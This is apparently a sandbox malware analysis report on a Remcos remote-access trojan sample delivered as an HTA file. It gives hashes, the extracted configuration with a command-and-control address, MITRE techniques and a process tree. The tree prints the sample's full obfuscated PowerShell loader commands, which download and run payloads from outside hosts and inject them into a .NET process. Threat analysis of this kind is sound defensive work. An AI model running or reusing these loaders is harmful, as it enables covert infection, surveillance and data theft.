remcos | 62db7e02b51b89f767c5740bb8569668ddcf134b2865959d9fc7a749209d0539

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-12-2024 02:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

62db7e02b51b89f767c5740bb8569668ddcf134b2865959d9fc7a749209d0539.hta
Size

81KB
MD5

76277ab4bde108fed474724b88ad0e39
SHA1

f73ba378275e5bc2492e53b63c96c22f35599ffc
SHA256

62db7e02b51b89f767c5740bb8569668ddcf134b2865959d9fc7a749209d0539
SHA512

7a914101c566fcf41b596ceafdde08674a979c9c20731d2e9a1dd0d58cf360204bca82b4680faa684806a5e7e4e88f285cb63bf414fd613878f7281cf60fc5a1
SSDEEP

768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAbvOx7ze2pe2Ju2x4/mlpu6ae28RWHTuQBwxW:tD

Score

10^/10

remcos remotehost defense_evasion discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

192.3.101.149:6946

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-DESYX7
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 5 IoCs

flow	pid	Process
15	4448	powershell.exe
18	1404	WScript.exe
20	1404	WScript.exe
26	1428	powershell.exe
34	1428	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
4448	powershell.exe
3632	cmd.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1428	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1428 set thread context of 1716	1428	powershell.exe	104
PID 1716 set thread context of 1028	1716	AddInProcess32.exe	105

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4448	powershell.exe
4448	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
2044	msedge.exe
2044	msedge.exe
2844	identity_helper.exe
2844	identity_helper.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1716	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	1428	powershell.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 4736 wrote to memory of 3632	4736	mshta.exe	83
PID 4736 wrote to memory of 3632	4736	mshta.exe	83
PID 4736 wrote to memory of 3632	4736	mshta.exe	83
PID 3632 wrote to memory of 4448	3632	cmd.exe	85
PID 3632 wrote to memory of 4448	3632	cmd.exe	85
PID 3632 wrote to memory of 4448	3632	cmd.exe	85
PID 4448 wrote to memory of 2460	4448	powershell.exe	86
PID 4448 wrote to memory of 2460	4448	powershell.exe	86
PID 4448 wrote to memory of 2460	4448	powershell.exe	86
PID 2460 wrote to memory of 440	2460	csc.exe	87
PID 2460 wrote to memory of 440	2460	csc.exe	87
PID 2460 wrote to memory of 440	2460	csc.exe	87
PID 4448 wrote to memory of 1404	4448	powershell.exe	88
PID 4448 wrote to memory of 1404	4448	powershell.exe	88
PID 4448 wrote to memory of 1404	4448	powershell.exe	88
PID 1404 wrote to memory of 1428	1404	WScript.exe	90
PID 1404 wrote to memory of 1428	1404	WScript.exe	90
PID 1404 wrote to memory of 1428	1404	WScript.exe	90
PID 1428 wrote to memory of 4112	1428	powershell.exe	103
PID 1428 wrote to memory of 4112	1428	powershell.exe	103
PID 1428 wrote to memory of 4112	1428	powershell.exe	103
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1428 wrote to memory of 1716	1428	powershell.exe	104
PID 1716 wrote to memory of 1028	1716	AddInProcess32.exe	105
PID 1716 wrote to memory of 1028	1716	AddInProcess32.exe	105
PID 1716 wrote to memory of 1028	1716	AddInProcess32.exe	105
PID 1716 wrote to memory of 1028	1716	AddInProcess32.exe	105
PID 1028 wrote to memory of 4076	1028	iexplore.exe	107
PID 1028 wrote to memory of 4076	1028	iexplore.exe	107
PID 1028 wrote to memory of 4216	1028	iexplore.exe	133
PID 1028 wrote to memory of 4216	1028	iexplore.exe	133
PID 4216 wrote to memory of 2592	4216	msedge.exe	134
PID 4216 wrote to memory of 2592	4216	msedge.exe	134

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\62db7e02b51b89f767c5740bb8569668ddcf134b2865959d9fc7a749209d0539.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4736
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4448
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\udqta0rd\udqta0rd.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2460
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0AE.tmp" "c:\Users\Admin\AppData\Local\Temp\udqta0rd\CSCC8AC4C2AE8DD4DFD9E9622399CC5D45B.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:440
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
      4⤵
      Blocklisted process makes network request
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1404
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1428
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:4112
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1716
        
        \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=iexplore.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        8⤵
        Enumerates system info in registry
        
        PID:4076
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff95a6046f8,0x7ff95a604708,0x7ff95a604718
        9⤵
        
        PID:4332
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
        9⤵
        
        PID:1440
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 /prefetch:3
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2044
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
        9⤵
        
        PID:4516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        9⤵
        
        PID:1804
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
        9⤵
        
        PID:4072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
        9⤵
        
        PID:4752
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
        9⤵
        
        PID:3932
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2844
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
        9⤵
        
        PID:4436
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
        9⤵
        
        PID:2240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
        9⤵
        
        PID:1352
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
        9⤵
        
        PID:436
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
        9⤵
        
        PID:4448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
        9⤵
        
        PID:3124
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
